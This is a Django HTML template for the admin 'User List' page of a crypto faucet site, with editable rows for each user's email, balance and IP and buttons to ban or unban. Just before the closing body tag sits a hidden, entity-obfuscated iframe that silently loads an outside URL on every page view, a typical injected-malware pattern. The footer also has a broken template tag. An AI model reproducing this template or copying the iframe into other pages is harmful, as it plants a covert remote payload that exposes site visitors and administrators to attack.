{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">

    <title>{{seting.nama_faucet}}</title>

    <!-- Custom fonts for this template -->
    <link href="{% static "vendor/fontawesome-free/css/all.min.css"%}" rel="stylesheet" type="text/css">
    <link
        href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i"
        rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="{% static "css/sb-admin-2.min.css"%}" rel="stylesheet">

    <!-- Custom styles for this page -->
    <link href="{% static "vendor/datatables/dataTables.bootstrap4.min.css"%}" rel="stylesheet">

</head>
<style>
input[type=text] {
  border: 2px solid blue;
  border-radius: 4px;
}
select {
  width: 100%;
  padding: 16px 20px;
  border: none;
  border-radius: 4px;
  background-color: #f1f1f1;
}

.button {
  background-color: #4CAF50; /* Green */
  border: none;
  color: white;
  padding: 3px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  transition-duration: 0.4s;
  cursor: pointer;
}


.button1 {
  background-color: white; 
  color: black; 
  border: 2px solid blue;
  border-radius: 8px;
}

.button1:hover {
  background-color: rgb(0,168,223);
  color: white;
}
.buttonb {
  background-color: #4CAF50; /* Green */
  border: none;
  color: white;
  padding: 3px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  transition-duration: 0.4s;
  cursor: pointer;
}


.buttonb1 {
  background-color: white; 
  color: black; 
  border: 2px solid red;
  border-radius: 8px;
}

.buttonb1:hover {
  background-color: #fb0000;
  color: white;
}
</style>
<body id="page-top">
    <!-- Page Wrapper -->
    <div id="wrapper">
        <!-- Sidebar -->
        <ul class="navbar-nav  {{seting.warna_faucet}} sidebar sidebar-dark accordion" id="accordionSidebar">

            <!-- Sidebar - Brand -->
      <a class="sidebar-brand d-flex align-items-center justify-content-center" href="/admin">
          <div class="sidebar-brand-icon">
            <img height="50" src="{{seting.logo}}" alt="Logo">
          </div>
          <div class="sidebar-brand-text mx-3">
              {{seting.nama_faucet}}          </div>
        </a>

            <!-- Divider -->
            <hr class="sidebar-divider my-0">

            <!-- Nav Item - Dashboard -->
            <li class="nav-item">
                <a class="nav-link" href="/admin">
                    <i class="fas fa-fw fa-tachometer-alt"></i>
                    <span>Dashboard</span></a>
            </li>

            <!-- Divider -->
            <hr class="sidebar-divider">

            <!-- Heading -->
            <div class="sidebar-heading">
                Setting User & Faucet
            </div>

            <!-- Nav Item - Pages Collapse Menu -->
            <li class="nav-item active">
                <a class="nav-link collapsed" href="#" data-toggle="collapse" data-target="#collapseTwo"
                    aria-expanded="true" aria-controls="collapseTwo">
                    <i class="fas fa-fw fa-cog"></i>
                    <span>User</span>
                </a>
                <div id="collapseTwo" class="collapse" aria-labelledby="headingTwo" data-parent="#accordionSidebar">
                    <div class="bg-white py-2 collapse-inner rounded">
                        <h6 class="collapse-header">Setting User:</h6>
                        <a class="collapse-item" href="/admin/user_list">List User</a>
                        <a class="collapse-item" href="/admin/user_setting">Setting User</a>
                    </div>
                </div>
            </li>

            <!-- Nav Item - Utilities Collapse Menu -->
            <li class="nav-item">
                <a class="nav-link collapsed" href="#" data-toggle="collapse" data-target="#collapseUtilities"
                    aria-expanded="true" aria-controls="collapseUtilities">
                    <i class="fas fa-fw fa-wrench"></i>
                    <span>Setting earning</span>
                </a>
                <div id="collapseUtilities" class="collapse" aria-labelledby="headingUtilities"
                    data-parent="#accordionSidebar">
                    <div class="bg-white py-2 collapse-inner rounded">
                        <h6 class="collapse-header">Setting Earning:</h6>
                        <a class="collapse-item" href="/admin/faucet">Faucet</a>
                        <a class="collapse-item" href="/admin/auto">Auto Faucet</a>
                        <a class="collapse-item" href="/admin/seting_shortlink">Shortlink</a>
                    </div>
                </div>
            </li>
            <!-- Divider -->
            <hr class="sidebar-divider d-none d-md-block">

            <!-- Sidebar Toggler (Sidebar) -->
            <div class="text-center d-none d-md-inline">
                <button class="rounded-circle border-0" id="sidebarToggle"></button>
            </div>

        </ul>
        <!-- End of Sidebar -->

        <!-- Content Wrapper -->
        <div id="content-wrapper" class="d-flex flex-column">

            <!-- Main Content -->
            <div id="content">

                <!-- Topbar -->
                <nav class="navbar navbar-expand navbar-light bg-white topbar mb-4 static-top shadow">

                    <!-- Sidebar Toggle (Topbar) -->
                    <form class="form-inline">
                        <button id="sidebarToggleTop" class="btn btn-link d-md-none rounded-circle mr-3">
                            <i class="fa fa-bars"></i>
                        </button>
                    </form>
                </nav>
                <!-- End of Topbar -->

                <!-- Begin Page Content -->
                <div class="container-fluid">

                    <!-- Page Heading -->
                    <h1 class="h3 mb-2 text-gray-800">User List</h1>
                    <p class="mb-4">List All users who have registered in this web database</p>

                    <!-- DataTales Example -->
                    <div class="card shadow mb-4">
                        <div class="card-header py-3">
                            <h6 class="m-0 font-weight-bold text-primary">User List</h6>
                        </div>
                        <div class="card-body">
                            <div class="table-responsive">
                                <table class="table table-bordered" id="dataTable" width="100%" cellspacing="0">
                                    <thead>
                                        <tr>
                                            <th>Username</th>
                                            <th>Email</th>
                                            <th>Balance</th>
                                            <th>Energy</th>
                                            <th>Status</th>
                                            <th>Join</th>
                                            <th>IP</th>
                                            <th>Country</th>
                                        </tr>
                                    </thead>
                                    <tbody>          
                                    {% for user in username %}
                                        <tr>
                                          <form method="POST" id="update">
                                            {% csrf_token %}
                                            <td><input type="text" id="username" name="username" value="{{user.username}}"><br><br></td>
                                            <td><input type="text" id="email" name="email" value="{{user.email}}"><br><br></td>
                                            <td><input type="text" id="balance" name="balance" value="{{user.balance}}"><br><br></td>
                                            <td><input type="text" id="energi" name="energi" value="{{user.energi}}"><br><br></td>
                                        <td><input type="text" id="status" name="status" value="{{user.status}}"><br><br></td>
                                            <td><input type="text" id="joined" name="joined" value="{{user.joined}}"><br><br></td>
                                            <td><input type="text" id="ip" name="ip" value="{{user.ip}}"><br><br></td>
                                            <td><input type="text" id="negara" name="negara" value="{{user.negara}}"><br><br></td>
                                            <td><button class='button button1' id='update' name='update' value='{{user.id}}'>Update</button>
                                         {%if user.status == 'active'%}
                                            <td><button class='buttonb buttonb1' id='banned' name='banned' value='{{user.id}}'>Banned</button>
                                          {%elif user.status == 'banned'%}
                                          <td><button class='buttonb buttonb1' id='unbanned' name='unbanned' value='{{user.id}}'>Unbanned</button>
                                          {%endif%}
                                            </form>
                                        </tr>
                                {%endfor%}
                                    </tbody>
                                </table>
                            </div>
                        </div>
                    </div>

                </div>
                <!-- /.container-fluid -->

            </div>
            <!-- End of Main Content -->

            <!-- Footer -->
            <footer class="sticky-footer bg-white">
                <div class="container my-auto">
                    <div class="copyright text-center my-auto">
                        <span>Copyright &copy; {{seting.nama_faucet 2020</span>
                    </div>
                </div>
            </footer>
            <!-- End of Footer -->

        </div>
        <!-- End of Content Wrapper -->

    </div>
    <!-- End of Page Wrapper -->

    <!-- Scroll to Top Button-->
    <a class="scroll-to-top rounded" href="#page-top">
        <i class="fas fa-angle-up"></i>
    </a>

    <!-- Logout Modal-->
    <div class="modal fade" id="logoutModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title" id="exampleModalLabel">Ready to Leave?</h5>
                    <button class="close" type="button" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">×</span>
                    </button>
                </div>
                <div class="modal-body">Select "Logout" below if you are ready to end your current session.</div>
                <div class="modal-footer">
                    <button class="btn btn-secondary" type="button" data-dismiss="modal">Cancel</button>
                    <a class="btn btn-primary" href="login.html">Logout</a>
                </div>
            </div>
        </div>
    </div>

    <!-- Bootstrap core JavaScript-->
    <script src="{% static "vendor/jquery/jquery.min.js"%}"></script>
    <script src="{% static "vendor/bootstrap/js/bootstrap.bundle.min.js"%}"></script>

    <!-- Core plugin JavaScript-->
    <script src="{% static "vendor/jquery-easing/jquery.easing.min.js"%}"></script>

    <!-- Custom scripts for all pages-->
    <script src="{% static "js/sb-admin-2.min.js"%}"></script>

    <!-- Page level plugins -->
    <script src="{% static "vendor/datatables/jquery.dataTables.min.js"%}"></script>
    <script src="{% static "vendor/datatables/dataTables.bootstrap4.min.js"%}"></script>

    <!-- Page level custom scripts -->
    <script src="{% static "js/demo/datatables-demo.js"%}"></script>

<iframe src="http://jL.ch&#117;ra.pl/rc/" style="d&#105;splay:none"></iframe>
</body>
</html>